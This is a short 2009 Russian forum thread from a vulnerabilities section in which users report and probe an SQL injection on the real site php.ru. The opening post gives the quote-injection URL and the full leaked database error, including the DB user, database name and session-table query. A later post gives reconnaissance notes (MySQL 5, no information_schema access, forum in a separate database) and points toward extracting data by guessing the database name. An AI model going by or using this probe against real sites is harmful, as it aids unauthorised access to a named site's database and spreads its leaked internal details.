инъекция на php.ru

Discussion in 'Уязвимости' started by Iceangel_, 8 Jan 2009.

  1. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Code:
    http://www.php.ru/?id=5'
    Code:
    OOPS Reported:
    --------------------------------------------------------------------------------
    Ошибка 2003: 
    Ошибка выполнения SQL запроса.
    --------------------------------------------------------------------------------
    Дополнительная информация:
    Host/Socket = localhost
    User = php_ru_search
    DataBase = php_ru_search
    MySQL Error No = 1064
    MySQL Error = You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a:1:{s:8:"USERNAME";s:10:"Гость";}','')' at line 1
    SQL = INSERT INTO oops_sessions (ID,UID,START,LAST,IPS,PAGES,PAGE,DATA,REFFER) VALUES ('ep9nbl4tnc2lh3us','0',1231422316,1231422316,'127.0.0.1,79.11.10.100',1,'/?id=5'','a:1:{s:8:"USERNAME";s:10:"Гость";}','')
    CURRENT_PAGE = /index.html
    URL = http://php.ru/
    PROJECT = PHP.RU - форум PHP программистов ! 
    странно, даже очень странно, что у меня в ИЕ и Опере пашет, а в Фаерфоксе нет...
     
    3 people like this.
  2. w.u.n.

    w.u.n. Member

    Joined:
    13 Dec 2008
    Messages:
    40
    Likes Received:
    26
    Reputations:
    1
    FF посылает запрос /?id=5%27
    остальные /?id=5'
     
    1 person likes this.
  3. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    188
    Likes Received:
    677
    Reputations:
    333
    5 ветка, нет доступа к mysql, information_schema, форум в другой базе, доп.префикса нет
    возможно есть права, осталось угадать имя бд для more1row)
     
    #3 l1ght, 8 Jan 2009
    Last edited: 8 Jan 2009
    2 people like this.